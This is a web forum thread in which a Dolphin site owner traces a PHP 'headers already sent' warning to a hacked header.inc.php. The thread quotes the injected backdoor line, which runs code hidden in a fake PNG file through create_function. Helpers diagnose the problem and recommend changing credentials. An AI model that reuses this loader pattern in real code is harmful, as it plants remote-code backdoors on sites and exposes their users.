Can someone please explain what this error message means???

Warning: Cannot modify header information - headers already sent by (output started at /home/ustillup/public_html/inc/header.inc.php(92) : runtime-created function(1) : runtime-created function(1) : eval()'d code:5) in/home/ustillup/public_html/inc/design.inc.php on line 133

 

What is very strange is that my site only shows this warning when I click on it in the search results.  If I type in the url into the address bar, my site shows up without this warning.

Can anyone please tell me what this means and possibly how I can resolve it?  Thanks.

No Signature at this time.
Quote · 28 Jan 2012

No ideas???

No Signature at this time.
Quote · 29 Jan 2012

have you edited any file or added anything to the script?

so much to do....
Quote · 29 Jan 2012

Hi, I sometimes get this error but only when in the Admin side? Not much help but thought I would share :)

Quote · 29 Jan 2012

It's an error that means absolutely nothing and is only placed in the Dolphin script to keep people coming here to post WTF posts so the fish forum seems like it's being used when it's really not.

Cool

http://towtalk.net ... Hosted by Zarconia.net!
Quote · 29 Jan 2012

So is there any way of figuring this out so I can remove it.  

Here is a change my hosting company made around the same time this error began appearing:

Your eaccelerator was set to use /tmp/eaccelerator. I updated the system php.ini file to use /var/tmp/eaccelerator which was already there. I also updated the php.ini in the ustillup directory to use /var/tmp instead of /tmp.

 

 

Could that have caused the issue???

No Signature at this time.
Quote · 29 Jan 2012

Try to have a look - what is on 92nd line in header.inc.php

Warning: Cannot modify header information - headers already sent by (output started at /home/ustillup/public_html/inc/header.inc.php(92) : runtime-created function(1) : runtime-created function(1) : eval()'d code:5) in/home/ustillup/public_html/inc/design.inc.php on line 133

 

What is very strange is that my site only shows this warning when I click on it in the search results.  If I type in the url into the address bar, my site shows up without this warning.

Can anyone please tell me what this means and possibly how I can resolve it?  Thanks.

 

Rules → http://www.boonex.com/terms
Quote · 29 Jan 2012

Thank You Alex T!!!!!!!!!!

The following line of code had been added to my inc/header.inc.php on line 92:

$define = create_function('', file_get_contents('/home/ustillup/public_html/avatarchat/images/dolphin.png')); $define();

When I checked out the image dolphin.png it was not an image at all but a file containing tons of malicious code.

However, when I tried to delete this file or replace it, my whole site shut down.  I then removed the line above from my inc/header.inc.php and everything is perfect again!!!

However, since I have no default file to compare my header.inc.php file with, as it was created when the site was created, I cannot compare the rest of this file with another to see if anything else was added.

Is there any way of checking my inc/header.inc.php to ensure nothing else has been altered?????

Is there a generic one I can look at to compare it with mine...???

Thanks!!!

No Signature at this time.
Quote · 30 Jan 2012

http://www.boonex.com/trac/dolphin/browser/tags/7.0/install/index.php#L69

 

There's the template Dolphin uses to create the header.inc.php file when installing.  It's the best I can do without posting a real one.

 

You best change all your server access information (cPanel password, FTP password, etc.), since the site appears to have been hacked. 

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
Quote · 30 Jan 2012

you didn't have a backup of your site?

so much to do....
Quote · 30 Jan 2012

 

you didn't have a backup of your site?

There's been reports of his site having malware for months.  I doubt a backup would do any good in this case. 

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
Quote · 30 Jan 2012

 oh! thats the case...:)

 

you didn't have a backup of your site?

There's been reports of his site having malware for months.  I doubt a backup would do any good in this case. 

 

so much to do....
Quote · 30 Jan 2012
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.